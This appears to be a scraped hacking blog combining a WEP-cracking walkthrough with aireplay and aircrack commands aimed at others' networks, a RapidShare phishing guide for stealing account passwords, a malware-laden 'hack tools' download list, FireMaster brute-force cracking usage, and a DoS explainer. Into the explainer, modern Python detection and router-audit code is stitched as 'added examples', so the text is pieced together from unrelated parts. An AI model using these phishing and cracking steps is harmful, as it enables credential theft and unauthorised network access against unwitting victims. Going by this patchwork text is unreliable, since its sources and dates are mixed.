Thursday, January 13, 2011

Gmail Phishing interesting


Friday, January 16, 2009

Crack WEP Tutorial WEP cracking [In 10mins]

Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:
Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1
As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).

Getting Started:
Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);


# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.

^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here . A full list of supported chipsets can
be found on the Kismet website under Documentation.
Changed kismet.conf:


# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.

Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N.
Going in for the kill:
So now you have got a target, you are going to make sure you don't look suspicious and that you have at least 15 mins worth of battery life left. Make sure you know the channel the Access Point is on (under the CH column in kismet) and also the MAC address of the Access Point, by hitting 's' (to sort), then scrolling to the desired Access Point and then typing 'i', which gives you detailed info on the Access Point selected.
First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use:


If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2
If you use wlan-ng, run
./ start wlan0 [comes with AirePlay2.2]
Otherwise run:
iwconfig ath0 mode Monitor channel
ifconfig ath0 up

Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
[version crap]
usage: ./airodump [mac filter]
./airodump wlan0 linksys
The MAC filter is used when you have more than one Access Point on the same channel at once, so say you have 'jim_home' and 'linksys', both ESSIDs of access points both on channel 11, you would grab the MAC address of the Access Point in kismet, by hitting 's' (to sort), then scrolling to the desired Access Point and then typing 'i', which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are what's known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number). Now we are going to capture a 'weak key' packet from the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):


capture packets unless interface #1 is specified.
source options:
-i : capture packet on-the-fly (default)
-r file : extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length, default: 40
-n len : maximum packet length, default: 512
-u type : fc, type - default: 2 = data
-v subt : fc, subtype - default: 0 = normal
-t tods : fc, To DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep : fc, WEP bit - default: 1
-y : don't ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-o fc0 : set frame control[0] (hex)
-p fc1 : set frame control[1] (hex)
-k : turn chopchop attack on

./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0
Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet, which aireplay will then ask you if you want to use to flood the Access Point with that packet. When it asks you if it can use one of the packets hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast as well, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):


aircrack 2.1 - (C) 2004 Christophe Devine
usage: ./aircrack [options] ...
-d : debug - specify beginning of the key
-f : bruteforce fudge factor (default: 2)
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 256 / 512
-p : SMP support: # of processes to start
-q : Quiet mode (less print more speed)

./aircrack -n 128 linksys.cap
what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.
KEY FOUND: [ Pwn3d ]
Happy WarDriving.
(Please reply with any errors in my tutorial)

Wednesday, December 17, 2008

Denial-Of-Services Attack - Detailed Explanation

Demystifying Denial-Of-Service attacks, part one By Admin @ Techmaifas. This paper provides an introduction to Denial of Service (DoS) attacks, their methodologies, common prevention techniques, and how they differ from Distributed Denial of Service (DDoS) Attacks. This article is intended to be a broad overview for the beginner or intermediate-level administrator on the different types of DoS attacks.

1. Definitions

We begin by defining Denial of Service and Distributed Denial of Service.

1.1 What is a DoS?

As the name implies, DoS is a Denial of Service to a victim trying to access a resource. In many cases it can be safely said that the attack requires a protocol flaw as well as some kind of network amplification.

Denial of Service is also an attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services through the consumption of the victim network's bandwidth, or the overloading of the victim system's computational resources. (see the Wikipedia definition)

The motivation for DoS attacks is not to break into a system. Instead, it is to deny the legitimate use of the system or network to others who need its services. One can say that this will typically happen through one of the following means:

1. Crashing the system.
2. Deny communication between systems.
3. Bring the network or the system down or have it operate at a reduced speed which affects productivity.
4. Hang the system, which is more dangerous than crashing since there is no automatic reboot. Productivity can be disrupted indefinitely.

DoS attacks can also be major components of other type of attacks.

1.2 What is a Distributed DoS?

A Distributed DoS (DDoS) is the combined effort of several machines to bring down a victim. In many cases there is a master machine that launches the attack to zombie machines that are part of a bot network, as shown below in Figure 1. Some bot networks contain many thousands of machines used to launch an attack.

With DoS and DDoS defined, we'll now take a look at attacks that affect the consumption of resources, such as Smurf attacks, and then address attacks like SYN Flood that affect network connectivity.

Note that the consumption of resources is most evident when it involves the exploitation of bandwidth, CPU usage, memory, disk space, or access to other computers and resources.

2. Bandwidth exhaustion attacks

A bandwidth exhaustion attack is where an attacker tries to consume the available bandwidth of a network by sending a flood of packets. This is most often accomplished with the help of several other machines. There is soon a flood of malicious nonsense packets on the network in large quantity, whereby the chances of survival of any good, legitimate packets become remote. Eventually the network becomes choked with these packets, and the network is effectively cut off from the Internet and services are denied.

An ideal example of a bandwidth exhaustion attack would be Smurf attacks. Consider a scenario with an ISP and three clients, as shown below in Figure 2. In this scenario, the ISP receives extensive traffic for client 2 on its backbone. Since the connection to client 2 is of limited capacity and smaller than the ISP's backbone, it can't push all the data received for client 2 through the link to client 2. Therefore it will start to drop packets, and the TCP connections will lead to retransmissions of the lost/dropped packets. There will be a time when a legitimate host wants to connect to Client 2's network, but this will timeout and hence a DoS will occur.

2.1 Smurf Attack

Named after a popular program which generates this attack, an ICMP echo request is sent to a broadcast network address (acting as an amplifying agent) with the source address of the victim spoofed. This results in a storm of replies from that network which, if large enough, has the power to take the victim's network down. It is to be noted that there is not much a victim can do about this attack since the link is simply overloaded with packets.

There are always three parts of a Smurf Attack:

1. Attacker
2. Amplifier - a router
3. Victim

This attack succeeds because the amplifier is misconfigured to forward the directed broadcasts.

Suppose the address range to is assigned to a company which has an amplifier, and an attacker sends packets with destination All the routers and systems from attacker to the amplifier will not see the difference between this IP and (an IP from the range). The packet reaches the amplifier and the amplifier notices that this is the broadcast address, so it forwards the request to all the systems on the network/subnet. This is known as directed broadcast.

The two crucial components of this attack were:

1. A misconfigured router forwarding the broadcast request to the subnet.
2. Machines that will respond to this ICMP broadcast request.

Going deeper we can see that the amplifier also makes itself and its network a victim of this attack.

Victims are typically chosen by attackers from IRC where bots (automated programs) are kept to look for the address of victims. Hackers often exchange the information about amplifiers with each other so when a mass attack takes place it usually appears to come from all over the globe.

Powertech provides realtime statistics of the top amplifiers currently on the Internet.

Below is a typical depiction of the dumps at the Victim. These are ICMP Echo replies received at the Victim's end. Then Figure 3 provides an overview of a Smurf attack.

10:10:17.100000 > victim: icmp: echo reply
10:10:18.300000 > victim: icmp: echo reply
10:10:18.310000 > victim: icmp: echo reply
10:10:19.110000 > victim: icmp: echo reply
10:11:09.190000 > victim: icmp: echo reply
10:11:09.240000 > victim: icmp: echo reply
10:11:10.110000 > victim: icmp: echo reply
10:11:10.600000 > victim: icmp: echo reply
10:11:10.790000 > victim: icmp: echo reply
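
Added example (not part of the original article): one way to recognise this pattern in a victim-side capture is to count echo replies the victim never asked for, grouped by source network. The log lines, addresses (RFC 5737 documentation ranges), thresholds and function names are constructed for illustration, and the parser assumes numeric "tcpdump -n" output in the old line format shown above.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed capture: one legitimate ping, then a burst of unsolicited replies.
SAMPLE_CAPTURE = """\
10:10:16.900000 198.51.100.10 > 192.0.2.1: icmp: echo request
10:10:16.950000 192.0.2.1 > 198.51.100.10: icmp: echo reply
10:10:17.100000 203.0.113.5 > 198.51.100.10: icmp: echo reply
10:10:17.105000 203.0.113.6 > 198.51.100.10: icmp: echo reply
10:10:17.110000 203.0.113.7 > 198.51.100.10: icmp: echo reply
10:10:17.300000 203.0.113.8 > 198.51.100.10: icmp: echo reply
10:10:18.310000 203.0.113.9 > 198.51.100.10: icmp: echo reply
10:10:18.400000 203.0.113.5 > 198.51.100.10: icmp: echo reply
10:11:40.000000 192.0.2.77 > 198.51.100.10: icmp: echo reply
"""

LINE_RE = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2}\.\d+)\s+(\S+)\s+>\s+([^\s:]+):"
    r"\s+icmp:\s+echo\s+(request|reply)"
)


def parse_line(line):
    """Return (seconds_since_midnight, src, dst, kind) or None if not ICMP echo."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    hh, mm, ss, src, dst, kind = m.groups()
    return int(hh) * 3600 + int(mm) * 60 + float(ss), src, dst, kind


def smurf_amplifier_networks(lines, victim, window=5.0, min_sources=4, prefix=24):
    """Map each suspected amplifier network to the largest number of distinct
    hosts in it that sent unsolicited echo replies within `window` seconds."""
    pinged = set()                # hosts the victim really sent a request to
    replies = defaultdict(list)   # network -> [(timestamp, source)]
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dst, kind = rec
        if kind == "request" and src == victim:
            pinged.add(dst)
        elif kind == "reply" and dst == victim and src not in pinged:
            try:
                net = ipaddress.ip_network(f"{src}/{prefix}", strict=False)
            except ValueError:
                continue          # resolved hostname, cannot be grouped
            replies[str(net)].append((ts, src))

    flagged = {}
    for net, events in replies.items():
        events.sort()
        start = best = 0
        for end in range(len(events)):
            # Slide the window so it spans at most `window` seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({s for _, s in events[start:end + 1]}))
        if best >= min_sources:
            flagged[net] = best
    return flagged


if __name__ == "__main__":
    print(smurf_amplifier_networks(SAMPLE_CAPTURE.splitlines(), "198.51.100.10"))
```

The flagged network is the amplifier, not the attacker: it is the address block to hand to the upstream ISP for filtering and to report to that network's operator.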

2.2 How to protect against Smurf attacks

Step 1. Amplifier Configuration. The router should be configured so that it does not forward directed broadcasts onto networks. It is important to note that the broadcast has to be disabled on all the routers and not merely just the external ones. Command "no ip directed-broadcast" on Cisco routers should do the job in most cases. This will also ensure that employees on the internal network won't be able to launch Smurf attacks. However it is also advisable that one has a filtering device (such as a firewall) on the perimeter, thereby providing an extra layer of security.

Step 2. Configure the server operating systems. Servers should be configured so that they will not respond to a directed broadcast request. FreeBSD is one such system which by default does not respond to this request. Other systems can be similarly configured, and this will be discussed in the next section.

Step 3. Victim issues. As mentioned earlier, not much can be done at the victim's end and damage will be done unless the victim's ISP takes some action to block these ICMP Echo Reply floods. Even if the victim's perimeter router denies the ICMP Echo Reply, the link from the ISP to the victim's site will suffer.
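
Added example (not part of the original article): a check for Step 1 that reads a saved Cisco running-config and lists every interface that would still forward directed broadcasts. The sample configuration is constructed; the function name and the default_enabled parameter are assumptions of this example. On IOS 12.0 and later directed broadcast is off unless "ip directed-broadcast" appears, so set default_enabled=True only when auditing older images where it was on by default.

```python
import re

# Constructed sample running-config (addresses are documentation ranges).
SAMPLE_CONFIG = """\
interface FastEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 ip directed-broadcast
!
interface FastEthernet0/1
 ip address 198.51.100.1 255.255.255.0
 no ip directed-broadcast
!
interface Serial0/0
 ip address 203.0.113.1 255.255.255.252
 ip directed-broadcast 110
!
interface FastEthernet1/0
 ip address 10.0.0.1 255.255.255.0
!
interface FastEthernet1/1
 ip directed-broadcast
 shutdown
"""


def audit_directed_broadcast(config_text, default_enabled=False):
    """Return {interface: finding} for interfaces that forward directed broadcasts."""
    state = {}
    current = None
    for raw in config_text.splitlines():
        if not raw.startswith(" "):
            # A non-indented line starts a new stanza (or is a '!' separator).
            m = re.match(r"interface\s+(\S+)", raw)
            current = m.group(1) if m else None
            if current:
                state[current] = {"enabled": default_enabled,
                                  "acl": None, "shutdown": False}
            continue
        if current is None:
            continue
        cmd = raw.strip()
        if cmd == "no ip directed-broadcast":
            state[current].update(enabled=False, acl=None)
            continue
        m = re.fullmatch(r"ip directed-broadcast(?:\s+(\S+))?", cmd)
        if m:
            # An optional access list restricts, but does not stop, forwarding.
            state[current].update(enabled=True, acl=m.group(1))
        elif cmd == "shutdown":
            state[current]["shutdown"] = True

    findings = {}
    for name, st in state.items():
        if not st["enabled"]:
            continue
        note = "forwards directed broadcasts"
        note += (f", filtered by access list {st['acl']}" if st["acl"]
                 else " to the whole subnet")
        if st["shutdown"]:
            note += " (interface currently shut down)"
        findings[name] = note
    return findings


if __name__ == "__main__":
    for iface, note in audit_directed_broadcast(SAMPLE_CONFIG).items():
        print(f"{iface}: {note}")
```

Run it against the configuration of every router, internal ones included, since the step above requires the setting everywhere and not only at the edge.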

2.3 ICMP Ping Flood attacks

Ping Floods are where an attacker floods the victim's network with a large number of ICMP Echo Requests - such as by flooding the network as fast as possible. In this scenario, filtering the incoming packets might help, however, if the victim is on a modem instead of a high-speed connection, nothing can be done. However the catch in this attack is that if not done properly the attacker can also be counter-attacked, so he needs to be on a faster network than the victim. In most cases, mitigating this attack involves isolating spoofed IPs. This attack is easy to perform since there are many tools on the Internet and little knowledge is required to execute a ping flood.

2.4 Fraggle attacks

A Fraggle attack is a Smurf variant that uses UDP instead of ICMP. In this case, the ports echo, chargen, daytime, qotd are used to trigger responses. These ports are also susceptible to a pingpong attack, and therefore these services should be turned off or blocked.

3. Network connectivity attacks

These attacks overload the victim so that its TCP/IP stack is not able to handle any further connections, and processing queues are completely full with nonsense malicious packets. As a consequence of this attack, legitimate connections are denied. One classic example of a network connectivity attack is a SYN Flood.

3.1 Example: SYN Flood attacks

A SYN Flood is where an attacker sends packets with a spoofed source IP Address and a TCP SYN Flag set to the server (victim). Let's first assume that the attacker knows which ports are open on the server. Since the source IP is spoofed, the response sent to the SYN packet by the server will never receive a reply back. The server will keep waiting until it times out. If this happens for a very large number of connections the result will be a DoS, since the server won't be available for any legitimate connections and its resources will be choked.

As will be shown, this attack exploits a vulnerability of the TCP protocol, by the way in which the TCP three-way connection is established. This is shown below in Figure 4.

3.2 Protecting against SYN Flood attacks

There are several things that can be done to protect against SYN Flood attacks.

1. Decrease the TCP Connection Timeout on the victim server.
2. Use a filtering device, like a firewall, at the perimeter which works as an intermediary in forwarding the connections to the server.
3. Use of a server farm: this can also help in fighting the SYN Flood since you will have a number of servers to answer the requests, but this also has limitations and overhead considerations.

A detailed article on SYN Flood protection by Mariusz Burdach was previously published on SecurityFocus. Therefore, only a short overview of SYN Flood protection will be discussed in this section.

3.2.1 Protecting Microsoft Windows from a SYN Flood attack

Microsoft Windows has a mechanism to detect and start SYN Flood protection. The SYN flooding attack protection feature detects symptoms of SYN flooding and responds by reducing the time the server spends on connection requests that it cannot acknowledge.

Specifically, TCP shortens the required interval between SYN-ACK (connection request acknowledgements) retransmissions. TCP retransmits SYN-ACKS when they are not answered. As a result, the allotted number of retransmissions is consumed more quickly and the unacknowledgeable connection request is discarded faster.

When enabled, the system monitors the connections maintained by TCP and starts the SYN attack flooding protection when any of the following conditions, symptomatic of SYN flooding, are found:

* The total number of connections in the half-open (SYN-RCVD) state exceeds the value of TcpMaxHalfOpen
* The number of connections that remain in the half-open (SYN-RCVD) state even after a connection request has been retransmitted exceeds the value of TcpMaxHalfOpenRetried
* The number of connection requests the system refuses exceeds the value of TcpMaxPortsExhausted. The system must refuse all connection requests when its reserve of open connection ports runs out.

Microsoft suggests the following registry settings:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\SynAttackProtect=1 REG_DWORD
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\TcpMaxConnectResponseRetransmissions=2 REG_DWORD
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\TcpMaxDataRetransmissions=3 REG_DWORD

3.2.2 Check Point protections against a SYN Flood attack

In the first scenario, we look at Check Point as a simple proxy to the victim server. This is shown below in Figure 5.

In this scenario Check Point acts a proxy to the server and responds to all the requests sent to the server. A request is forwarded to the server only if there is a corresponding ACK. The drawback of this configuration is that normally a perimeter firewall is very heavily loaded and this configuration will induce further load on it. The advantage is that the server will always be free to only take legitimate connections.

In the second scenario, we look at Check Point preventing a SYN Flood attack while residing in a transparent proxy configuration. This is shown below in Figure 6.

Here Check Point passes all the connections, irrespective of whether they are legitimate or not, to the server but also starts a timer once it sees an ACK/SYN from the server. If there is no corresponding ACK from the client and the timer expires, the firewall will send a RST to the server, thereby preventing its queue from overflowing with illegitimate connections. The advantage of this configuration is that the load on the firewall is reduced considerably as compared to the previous configuration. The drawback, however, is that now the server sees all the connection attempts.
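
Added example (not part of the original article and not Check Point code): a small model of the two configurations described above, run over the same constructed trace of client packets, to show where the half-open state sits in each. The mode names "relay" and "passive", the 3000 ms timer and all addresses are assumptions of this example, and the server's SYN/ACK is treated as instantaneous.

```python
# Constructed client-side trace: (time in ms, packet kind, (client ip, port)).
LEGIT_1 = ("192.0.2.10", 40000)
LEGIT_2 = ("192.0.2.11", 40001)
SPOOF_1 = ("203.0.113.1", 1025)
SPOOF_2 = ("203.0.113.2", 1026)
SPOOF_3 = ("203.0.113.3", 1027)

PACKETS = [
    (0, "SYN", LEGIT_1), (50, "ACK", LEGIT_1),
    (100, "SYN", SPOOF_1),      # spoofed sources never send the final ACK
    (200, "SYN", SPOOF_2),
    (300, "SYN", SPOOF_3),
    (5000, "SYN", LEGIT_2), (5040, "ACK", LEGIT_2),
]


def simulate(packets, mode, timeout_ms=3000):
    """Model the firewall in front of the server.

    relay   - first scenario: the firewall answers SYNs itself and forwards a
              connection to the server only after the client's ACK arrives.
    passive - second scenario: SYNs go straight to the server; the firewall
              times each handshake and resets the server's half-open entry
              when no ACK arrives in time.
    """
    if mode not in ("relay", "passive"):
        raise ValueError(f"unknown mode: {mode}")
    pending = {}                      # handshake in progress -> deadline (ms)
    established, resets = [], []
    fw_peak = server_peak = 0

    def expire(now):
        for conn, deadline in sorted(pending.items(), key=lambda kv: kv[1]):
            if deadline <= now:
                del pending[conn]
                if mode == "passive":
                    # Firewall tells the server to free its queue slot.
                    resets.append((deadline, conn))

    for ts, kind, conn in sorted(packets):
        expire(ts)
        if kind == "SYN":
            pending[conn] = ts + timeout_ms
        elif kind == "ACK" and conn in pending:
            del pending[conn]
            established.append(conn)
        fw_peak = max(fw_peak, len(pending))
        if mode == "passive":
            # Every pending handshake also occupies the server's own queue.
            server_peak = max(server_peak, len(pending))
    expire(float("inf"))              # timers still running when the trace ends

    return {
        "established": established,
        "resets_to_server": resets,
        "server_peak_half_open": server_peak,
        "firewall_peak_pending": fw_peak,
    }


if __name__ == "__main__":
    for mode in ("relay", "passive"):
        print(mode, simulate(PACKETS, mode))
```

Both modes let the two legitimate clients through; the difference is that in relay mode the server's half-open count stays at zero, while in passive mode it rises with the flood until the firewall's resets clear it.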

4. Conclusion

In this article we've defined DoS and DDoS and looked at attacks that affect the consumption of bandwidth: Smurf attacks, ICMP ping floods, and Fraggle attacks. We've also taken a first look at attacks that affect network connectivity, such as SYN Flood attacks and some of the ways to prevent them.

Next time in part two, we'll look at the consumption of other precious resources such as CPU time, disk space, memory utilization, and then examine any vulnerable printers that may be DoS attack vectors on the network. We'll also discuss Teardrop attacks, LAND attacks, Ping-of-death, and finally discuss some common Win32 worms that have been used to build botnets that perform broad DDoS attacks. Finally, we'll discuss mitigation techniques and best practices for preventing DoS attacks. Stay tuned.

WinRar Password Remover

RAR Password Recovery is a powerful tool to recover lost (forgotten) passwords for a RAR/WinRAR (2.xx and 3.xx) archives. The program supports the "brute-force" attack, dictionary-based attack and dramatically fastest "Booost-Up" attack. The program is able to resume the previous interrupted attack..

Here is a brief list of RAR Password Recovery advantages:

Recovers passwords for a RAR/WinRAR archives of versions 2.xx and 3.xx using combination of Brute-Force, Booost-Up or Dictionary attacks.
Very high speed of work (more than 3000 passwords per second in Brute-Force mode and up to 22000 passwords per second in Booost-Up mode).
Advanced heuristic processor.
User-friendly interface.
Large wordlist dictionary.
Ability to work in the background.
Autosave feature.

Useful Hack Tools {Best of 2008}

This download would be detected as virus, but dont worry all of the tools have malicious code which will help you to hack. But it wont do anything wrong to your computer.

What does it have?
AOL new.rar
Astaroth Joiner v2.rar
Cable Modem Sniffer.rar
CGI Founder
DDL Sites.rar
E-mail Cracker.rar
F.B.I - Binder.rar
FTP Brute Forcer.rar
~Censored~ Mail Bomber 2.3.rar
Hack MY
Hack Photoshop
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Key Changer.rar
Legion NetBios Scanner
Mail Boomb_2.0
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NFO Maker
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass
Ping & Nukes.rar
Port Listener XP.rar
Pure phpBB Email harvester.rar
Remote Shut Down.rar
Server 2003 Keygen.rar
Server Killer.rar
Source Checker.rar
source codes.rar
SQLScan v1.0.rar
Stealth - HTTP Scanner v1.0 build
UC.Forum Spam.rar
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
Win XP Activator.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar

RapidShare Hacking

U must have noticed many rapidshare account posted on the site... i have got many members asking me how i did it.... so heres the way... enjoy phishing... please remember to share them on the website as we cant change the password.... only owner of the account can change the pass.

1. You will need to have the phishing files which u can download from

2. Once you download these files u will need to upload them to a webhost so everyone can see that here are some list of free webhosts...

Code: or any other u know

3. Now upload all of the files to your webhost.

4. Now one of the files in the download would be "config.php" which will need to edit. So open that file with notepad.

5. Find this text in that file
PHP Code:
$website ""//Full Path To Install
$phishingnet="yourPhisherpasswords.txt" //Textfile Where To Store The Accounts
6. Just make appropriate changes to this code as per the webhost name and the folder where you have uploaded the phishing files.

7. Now here goes the format of the link which u can give to the victim in order to steal their password.

8. Now you're all set... just give this phishing link to the victim which will exactly look like the rapidshare page and even he will download the file whicheva u give the link for... but the only difference would be username and password would be send to you as well

Additional Tips:-

As you know now you would have long URL's which looks suspicious to advanced users, so what u can do is u can try to shorten the URL with some free websites... here are some examples.

So enjoy RapidShare hacking...

Saturday, December 13, 2008

FireMaster The Firefox Master Password Recovery Tool

Version 3.1: 28th Sep 2008
Fixed the bug in recovering the master password for Iceweasel which is browser derived from Firefox.
Version 3.0: 29th July 2008
Support for Firefox version 3.0, now you can recover the master password of latest version of Firefox. The differences in reading the Firefox key database file is resolved.
Kudos to the Firefox crew for yet another beautiful version of Firefox...!
Version 2.5:  22nd March 2008
Pattern based brute force password recovery method is implemented which reduces the time considerably when certain part of the password is already known. Also minimum length of password can be specified which improves the recovery time greatly.  
Usage is simplified by forcing one crack method at a time and providing better meaningful options. Fixed the bug in displaying statistics and now it displays the remaining time accurately based on the current speed which is computed dynamically.
Thanks for your suggestions and feedbacks...
Version 2.2:  8th July 2006
FireMaster source code is released under GPL v2.
Version 2.1:  18th June 2006
Tested successfully with latest version of Firefox.
Statistics display during the operation is improved.
Version 2.0:  25th Feb 2006
First public release of FireMaster SOURCE code.
Now it works at amazing speed of 50k passwords per second on normal m/c.
Firefox library dependency is removed completely.
For brute force, speed and time is displayed during operation.
Lots of optimizations and few bug fixes.
Thanks to 'T Barton' for reporting the bug with 1.5 version.
Version 1.5:  14th Jan 2006
Bug in parsing key3.db fixed.
Displaying results during recovery operation.
Speed is doubled compared to the original version.
Version 1.0:  1st Jan 2006
First public release of FireMaster.
About FireMaster
Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it. To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file.
About Firefox Password Manager and Master Password
Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This sign-on information is stored in the encrypted form in Firefox database files residing in user's profile directory. However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as FirePassword.
Hence to protect from such threats, Firefox uses master password to provide enhanced security. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view sign-on credentials. So if you have lost the master password, then you have lost all the stored credentials as well.
So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.
Internals of FireMaster
Once you have lost master password, there is no way to recover it as it is not stored at all. Whenever user enters the master password, Firefox uses it to decrypt the encrypted data associated with the known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses the similar technique to check for the master password, but in more optimized way. The entire operation goes like this.
  • FireMaster generates passwords on the fly through various methods.
  • Then it computes the hash of the password using known algorithm.
  • Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").
  • Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.
Firefox stores the details about encrypted string, salt, algorithm and version information in key database file key3.db in the user's profile directory. You can just copy this key3.db file to different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high end machine for faster recovery operation.
FireMaster supports following password generation methods

1) Dictionary Method
In this mode, FireMaster uses dictionary file having each word on separate line to perform the operation. You can find lot of online dictionary with different sizes and pass it on to Firemaster. This method is more quicker and can find out common passwords.
2) Hybrid Method
This is advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with generated word from known character list. This can find out password like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.
3) Brute Force Method
In this method, all possible combinations of words from given character list is generated and then subjected to cracking process. This may take long time depending upon the number of characters and position count specified.
How to use FireMaster?
First you need to copy the key3.db file to temporary directory. Later you have to specify this directory path for FireMaster as a last argument.

Here is the general usage information

Firemaster [-q] 
           [-d -f
           [-h -f -n -g "charlist" [ -s | -p ] ]
           [-b -m -l -c "charlist" -p "pattern" ]

Dictionary Crack Options:
   -d  Perform dictionary crack
   -f  Dictionary file with words on each line
Hybrid Crack Options:
   -h  Perform hybrid crack operation using dictionary passwords.
       Hybrid crack can find passwords like pass123, 123pass etc
   -f  Dictionary file with words on each line
   -g  Group of characters used for generating the strings
   -n  Maximum length of strings to be generated using above character list
       These strings are added to the dictionary word to form the password
   -s  Suffix the generated characters to the dictionary word (pass123)
   -p  Prefix the generated characters to the dictionary word (123pass)
Brute Force Crack Options:
   -b  Perform brute force crack
   -c  Character list used for brute force cracking process
   -m  [Optional] Specify the minimum length of password
   -l  Specify the maximum length of password
   -p  [Optional] Specify the pattern for the password
Sample Usage Information
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt Firefox_Profile_Path
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s Firefox_Profile_Path
 // Brute Force Crack
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" Firefox_Profile_Path
Here Firefox_Profile_Path refers to the directory where key3.db file is present. This points to the Firefox profile directory (Ex: C:\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\) on your machine. However you can also copy key3.db file from any other machine such as Linux system to your local windows machine and specify that path during recovering operation.
Quiet mode ( -q option ) will disable printing each password while recovery is in progress. This makes it much faster especially for brute force operation. However during brute force operation if the password count exceeds 50000 passwords then it automatically enters the quiet mode.
Hybrid method tries normal dictionary password as well as password created by appending/prefixing the generated strings to the dictionary word. For example if the dictionary word is "test" and you have specified character set as '123' (-g 123 -s) then the new passwords will be test1, test12, test123, test32 etc.
Character list (-g for hybrid and -c for brute force) specifies the characters to be used for generating passwords. If you don't specify then the default character list is used. For brute force -m indicates the minimum length of password to be generated. This can reduce the generated passwords and hence the time considerably when large number of character set is specified. Similarly -l (small 'L') specifies the maximum length of password to be generated. For example, if you specify -m 6 and -l 8 then only passwords which are of length at least 6 and above but below 8 will be generated. 

Now you can reduce the password cracking time significantly using pattern based password recovery mechanism. If you know that password is of certain length and also remember few characters then you can specify that pattern for brute force cracking. For example, assume that you have set the master password of length 12 and it begins with 'fire' and ends with '123' then command will look like below
